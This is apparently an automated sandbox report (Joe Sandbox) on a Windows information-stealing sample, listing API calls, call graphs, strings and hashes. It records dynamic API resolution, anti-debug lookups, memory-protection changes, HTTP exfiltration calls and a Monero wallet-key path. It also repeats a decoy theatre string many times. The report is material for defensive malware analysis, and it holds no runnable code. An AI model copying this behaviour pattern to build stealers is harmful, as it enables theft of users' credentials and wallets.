15856 1489f9 GetProcessHeap HeapFree 15854->15856 15855->15769 15856->15855 15857->15769 15859 14a7a0 lstrcpy 15858->15859 15860 135119 15859->15860 15861 1347b0 2 API calls 15860->15861 15862 135125 15861->15862 16018 148ea0 15862->16018 15864 135184 15865 135192 lstrlen 15864->15865 15866 1351a5 15865->15866 15867 148ea0 4 API calls 15866->15867 15868 1351b6 15867->15868 15869 14a740 lstrcpy 15868->15869 15870 1351c9 15869->15870 15871 14a740 lstrcpy 15870->15871 15872 1351d6 15871->15872 15873 14a740 lstrcpy 15872->15873 15874 1351e3 15873->15874 15875 14a740 lstrcpy 15874->15875 15876 1351f0 15875->15876 15877 14a740 lstrcpy 15876->15877 15878 1351fd InternetOpenA StrCmpCA 15877->15878 15879 13522f 15878->15879 15880 1358c4 InternetCloseHandle 15879->15880 15881 148b60 3 API calls 15879->15881 15887 1358d9 codecvt 15880->15887 15882 13524e 15881->15882 15883 14a920 3 API calls 15882->15883 15884 135261 15883->15884 15885 14a8a0 lstrcpy 15884->15885 15886 13526a 15885->15886 15888 14a9b0 4 API calls 15886->15888 15891 14a7a0 lstrcpy 15887->15891 15889 1352ab 15888->15889 15890 14a920 3 API calls 15889->15890 15892 1352b2 15890->15892 15898 135913 15891->15898 15893 14a9b0 4 API calls 15892->15893 15894 1352b9 15893->15894 15895 14a8a0 lstrcpy 15894->15895 15896 1352c2 15895->15896 15897 14a9b0 4 API calls 15896->15897 15899 135303 15897->15899 15898->15845 15900 14a920 3 API calls 15899->15900 15901 13530a 15900->15901 15902 14a8a0 lstrcpy 15901->15902 15903 135313 15902->15903 15904 135329 InternetConnectA 15903->15904 15904->15880 15905 135359 HttpOpenRequestA 15904->15905 15907 1358b7 InternetCloseHandle 15905->15907 15908 1353b7 15905->15908 15907->15880 15909 14a9b0 4 API calls 15908->15909 15910 1353cb 15909->15910 15911 14a8a0 lstrcpy 15910->15911 15912 1353d4 15911->15912 15913 14a920 3 API calls 15912->15913 15914 1353f2 15913->15914 15915 14a8a0 lstrcpy 15914->15915 15916 1353fb 15915->15916 15917 14a9b0 4 API calls 15916->15917 15918 13541a 15917->15918 15919 14a8a0 lstrcpy 15918->15919 15920 135423 15919->15920 15921 14a9b0 4 API calls 15920->15921 15922 135444 15921->15922 15923 14a8a0 lstrcpy 15922->15923 15924 13544d 15923->15924 15925 14a9b0 4 API calls 15924->15925 15926 13546e 15925->15926 15927 14a8a0 lstrcpy 15926->15927 16019 148ead CryptBinaryToStringA 16018->16019 16023 148ea9 16018->16023 16020 148ece GetProcessHeap RtlAllocateHeap 16019->16020 16019->16023 16021 148ef4 codecvt 16020->16021 16020->16023 16022 148f05 CryptBinaryToStringA 16021->16022 16022->16023 16023->15864 16027->15300 16270 139880 16028->16270 16030 1398e1 16030->15307 16032 14a740 lstrcpy 16031->16032 16033 13fb16 16032->16033 16205 14a740 lstrcpy 16204->16205 16206 140266 16205->16206 16207 148de0 2 API calls 16206->16207 16208 14027b 16207->16208 16209 14a920 3 API calls 16208->16209 16210 14028b 16209->16210 16211 14a8a0 lstrcpy 16210->16211 16212 140294 16211->16212 16213 14a9b0 4 API calls 16212->16213 16214 1402b8 16213->16214 16271 13988d 16270->16271 16274 136fb0 16271->16274 16273 1398ad codecvt 16273->16030 16277 136d40 16274->16277 16278 136d63 16277->16278 16287 136d59 16277->16287 16293 136530 16278->16293 16282 136dbe 16282->16287 16303 1369b0 16282->16303 16284 136e2a 16285 136ef7 16284->16285 16286 136ee6 VirtualFree 16284->16286 16284->16287 16288 136f41 16285->16288 16289 136f26 FreeLibrary 16285->16289 16290 136f38 16285->16290 16286->16285 16287->16273 16288->16287 16291 1489f0 2 API calls 16288->16291 16289->16285 16292 1489f0 2 API calls 16290->16292 16291->16287 16292->16288 16294 136542 16293->16294 16296 136549 16294->16296 16313 148a10 GetProcessHeap RtlAllocateHeap 16294->16313 16296->16287 16297 136660 16296->16297 16302 13668f VirtualAlloc 16297->16302 16299 136730 16300 136743 VirtualAlloc 16299->16300 16301 13673c 16299->16301 16300->16301 16301->16282 16302->16299 16302->16301 16304 1369c9 16303->16304 16308 1369d5 16303->16308 16305 136a09 LoadLibraryA 16304->16305 16304->16308 16306 136a32 16305->16306 16305->16308 16312 136ae0 16306->16312 16314 148a10 GetProcessHeap RtlAllocateHeap 16306->16314 16308->16284 16309 136ba8 GetProcAddress 16309->16308 16309->16312 16310 1489f0 2 API calls 16310->16312 16311 136a8b 16311->16308 16311->16310 16312->16308 16312->16309 16313->16296 16314->16311

                  Executed Functions

                  Function 00149860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 149860-149874 call 149750 663 149a93-149af2 LoadLibraryA * 5 660->663 664 14987a-149a8e call 149780 GetProcAddress * 21 660->664 666 149af4-149b08 GetProcAddress 663->666 667 149b0d-149b14 663->667 664->663 666->667 669 149b46-149b4d 667->669 670 149b16-149b41 GetProcAddress * 2 667->670 671 149b4f-149b63 GetProcAddress 669->671 672 149b68-149b6f 669->672 670->669 671->672 673 149b71-149b84 GetProcAddress 672->673 674 149b89-149b90 672->674 673->674 675 149bc1-149bc2 674->675 676 149b92-149bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(75900000,010206C0), ref: 001498A1
                  • GetProcAddress.KERNEL32(75900000,010205A0), ref: 001498BA
                  • GetProcAddress.KERNEL32(75900000,010205B8), ref: 001498D2
                  • GetProcAddress.KERNEL32(75900000,01020780), ref: 001498EA
                  • GetProcAddress.KERNEL32(75900000,01020678), ref: 00149903
                  • GetProcAddress.KERNEL32(75900000,01028AA0), ref: 0014991B
                  • GetProcAddress.KERNEL32(75900000,01016700), ref: 00149933
                  • GetProcAddress.KERNEL32(75900000,010167A0), ref: 0014994C
                  • GetProcAddress.KERNEL32(75900000,01020618), ref: 00149964
                  • GetProcAddress.KERNEL32(75900000,01020810), ref: 0014997C
                  • GetProcAddress.KERNEL32(75900000,01020720), ref: 00149995
                  • GetProcAddress.KERNEL32(75900000,010207B0), ref: 001499AD
                  • GetProcAddress.KERNEL32(75900000,01016A00), ref: 001499C5
                  • GetProcAddress.KERNEL32(75900000,01020648), ref: 001499DE
                  • GetProcAddress.KERNEL32(75900000,01020690), ref: 001499F6
                  • GetProcAddress.KERNEL32(75900000,010168A0), ref: 00149A0E
                  • GetProcAddress.KERNEL32(75900000,010206A8), ref: 00149A27
                  • GetProcAddress.KERNEL32(75900000,010208A0), ref: 00149A3F
                  • GetProcAddress.KERNEL32(75900000,01016800), ref: 00149A57
                  • GetProcAddress.KERNEL32(75900000,01020918), ref: 00149A70
                  • GetProcAddress.KERNEL32(75900000,01016820), ref: 00149A88
                  • LoadLibraryA.KERNEL32(010208B8,?,00146A00), ref: 00149A9A
                  • LoadLibraryA.KERNEL32(01020858,?,00146A00), ref: 00149AAB
                  • LoadLibraryA.KERNEL32(010208D0,?,00146A00), ref: 00149ABD
                  • LoadLibraryA.KERNEL32(010208E8,?,00146A00), ref: 00149ACF
                  • LoadLibraryA.KERNEL32(01020870,?,00146A00), ref: 00149AE0
                  • GetProcAddress.KERNEL32(75070000,01020888), ref: 00149B02
                  • GetProcAddress.KERNEL32(75FD0000,01020900), ref: 00149B23
                  • GetProcAddress.KERNEL32(75FD0000,01028DF0), ref: 00149B3B
                  • GetProcAddress.KERNEL32(75A50000,01028C40), ref: 00149B5D
                  • GetProcAddress.KERNEL32(74E50000,010169E0), ref: 00149B7E
                  • GetProcAddress.KERNEL32(76E80000,01028AF0), ref: 00149B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00149BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00149BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: f4730380f9c9e9e980e273af06bdb9e5d7192fe967c7147d1adf4cdff0a0da4a
                  • Instruction ID: 9acfe3d4cd8a4a292fff3ae24b2a08b4de6001544d399fc1767fd941f02f2245
                  • Opcode Fuzzy Hash: f4730380f9c9e9e980e273af06bdb9e5d7192fe967c7147d1adf4cdff0a0da4a
                  • Instruction Fuzzy Hash: 76A149B5504A80AFD36AEFA8ED8995A3BFDF7C8301F04451AA61D83264D63998C1DF13
                  Function 001345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 1345c0-134695 RtlAllocateHeap 781 1346a0-1346a6 764->781 782 13474f-1347a9 VirtualProtect 781->782 783 1346ac-13474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0013460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0013479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 6485da416469b8c126e0b9db73453eeadbdc1890ac98114e1c74a2e97d25493b
                  • Instruction ID: c1f29e88ae35a8a7e22a5803edf96cc680d758fce7e7372fdda73707c6be3bd1
                  • Opcode Fuzzy Hash: 6485da416469b8c126e0b9db73453eeadbdc1890ac98114e1c74a2e97d25493b
                  • Instruction Fuzzy Hash: D44114606CB688EFE734B7E4AC72D9D7A67EF42F0AF505044BE205A292CFB075454531
                  Function 00134880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 134880-134942 call 14a7a0 call 1347b0 call 14a740 * 5 InternetOpenA StrCmpCA 816 134944 801->816 817 13494b-13494f 801->817 816->817 818 134955-134acd call 148b60 call 14a920 call 14a8a0 call 14a800 * 2 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a920 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a920 call 14a8a0 call 14a800 * 2 InternetConnectA 817->818 819 134ecb-134ef3 InternetCloseHandle call 14aad0 call 139ac0 817->819 818->819 905 134ad3-134ad7 818->905 829 134f32-134fa2 call 148990 * 2 call 14a7a0 call 14a800 * 8 819->829 830 134ef5-134f2d call 14a820 call 14a9b0 call 14a8a0 call 14a800 819->830 830->829 906 134ae5 905->906 907 134ad9-134ae3 905->907 908 134aef-134b22 HttpOpenRequestA 906->908 907->908 909 134b28-134e28 call 14a9b0 call 14a8a0 call 14a800 call 14a920 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a920 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a920 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a9b0 call 14a8a0 call 14a800 call 14a920 call 14a8a0 call 14a800 call 14a740 call 14a920 * 2 call 14a8a0 call 14a800 * 2 call 14aad0 lstrlen call 14aad0 * 2 lstrlen call 14aad0 HttpSendRequestA 908->909 910 134ebe-134ec5 InternetCloseHandle 908->910 1021 134e32-134e5c InternetReadFile 909->1021 910->819 1022 134e67-134eb9 InternetCloseHandle call 14a800 1021->1022 1023 134e5e-134e65 1021->1023 1022->910 1023->1022 1025 134e69-134ea7 call 14a9b0 call 14a8a0 call 14a800 1023->1025 1025->1021
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00134915
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 0013493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00134ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00150DDB,00000000,?,?,00000000,?,",00000000,?,0102E580), ref: 00134DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00134E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00134E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00134E49
                  • InternetCloseHandle.WININET(00000000), ref: 00134EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00134EC5
                  • HttpOpenRequestA.WININET(00000000,0102E530,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00134B15
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • InternetCloseHandle.WININET(00000000), ref: 00134ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: bad06ee184c0e1e1109be0772072f34b94c1b04f1770de32de997022c854667b
                  • Instruction ID: 1b2f2aba3f54341b9c6077f03b7fd69deb2a2b1ad66df9f5390b09c5745dd32f
                  • Opcode Fuzzy Hash: bad06ee184c0e1e1109be0772072f34b94c1b04f1770de32de997022c854667b
                  • Instruction Fuzzy Hash: EA12F172990119AAEB15EB90DC62FEEB378FF64305F914199B106620A1DF702F49CF62
                  Function 00147850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001311B7), ref: 00147880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0014789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
